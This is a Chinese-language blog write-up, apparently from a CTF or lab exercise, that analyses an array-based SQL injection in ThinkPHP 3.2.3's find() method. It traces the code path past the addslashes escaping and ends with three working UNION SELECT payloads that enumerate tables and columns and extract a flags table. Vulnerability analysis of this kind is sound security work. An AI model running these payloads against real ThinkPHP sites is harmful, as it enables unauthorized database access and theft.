Thinkphp 3.2.3 sql注入漏洞

源代码

class IndexController extends Controller {
    public function index(){
    $a=M('xxx');  //表名
    $id=I('GET.id');
    $b=$a->find($id);
    var_dump($b);
    }
}

创建一个test数据库
然后开启mysql命令行

CREATE TABLE `Course`(
`id` VARCHAR(20),
`username` VARCHAR(20) NOT NULL DEFAULT '',
`password` VARCHAR(20) NOT NULL,
PRIMARY KEY(`id`)
);

insert into Course values('1' , '1111' , '1111');
insert into Course values('2' , '2222' , '2222');

然后修改
thinkphp-3.2\thinkphp-3.2\Application\Home\Conf\config.php

<?php
return array(
	//'配置项'=>'配置值'
    'DB_TYPE'=>'mysqli',      //数据库类型
    'DB_HOST'=>'localhost',  //服务器地址
    'DB_NAME'=>'test',       //数据库名
    'DB_USER'=>'root',       //数据库账号
    'DB_PWD'=>'root',            //数据库密码
    'DB_PORT'=>3306,         //数据库端口
          //数据库表前缀
    'DB_CHARSET'=>'utf8',    //数据库字符编码
    'DB_DEBUG'  =>  TRUE   //数据库sql调试日志的开启
);

环境搭建完成
在这里插入图片描述测试payload
在这里插入图片描述
没问题,环境搭建完成

分析漏洞

其实问题首先出现在一个地方
在这里插入图片描述
我们看这里find函数判断$options是否为数字或者字符串,然后后面相当于把id设为一个数组
在这里插入图片描述相当于

$options=array(
'where'=>array(
'id'=>'1'
)
);

然后我们按照这种思路继续跟进
在_parseOption中发现
在这里插入图片描述

参数会进入函数,我们继续跟,进入_parseType
在这里插入图片描述

进入select函数
在这里插入图片描述
然后发现参数进入buildSelectSql,继续跟。
在这里插入图片描述
之后进入parseSql

在这里插入图片描述
跟进parsewhere
在这里插入图片描述
进入parsevalue,发现在这一步进行转义,注意观察,此时的1’已经变为1’/,我们跟进escapestring----继续跟进发现它使用了addslashes函数进行转义。
在这里插入图片描述
我们继续跟进
在这里插入图片描述
最后发现此时sql注入已经被阻拦。
在这里插入图片描述如果为数组呢
我们在尝试

数组注入

?id[where]=1’

到达find函数,这里find函数判断$options是否为字符串或者整数,因为我们传入的是一个数组直接跳过
在这里插入图片描述
此时我们的option为

$options=array(
'where'=>'1'
);

到达过滤的函数时,发现if判断没有进去,相当于直接过了。
在这里插入图片描述
按照刚才的方式往下走到_parseOptions,如果我们的options[‘where’]是数组的话会进入_parseType,我们前面说到,现在的options[‘where’]="1’"是个字符串,也就不会进入这个if,所以当目标数据库中的id字段是int型时可以绕过intval过滤。

接着往后走,直接在parsewhere中进入if$whereStr = $where; 最终返回的内容是WHERE 1’
在这里插入图片描述
在这里插入图片描述
最后我们的’也就被保留了下来
在这里插入图片描述
接下来就可以进行注入攻击了

payload

?id[where]=id=0 union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4#



?id[where]=id=0 union select 1,(select group_concat(column_name) from information_schema.columns where table_name='flags'),3,4#



?id[where]=id=0 union select 1,(select flag4s from flags),3,4#
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值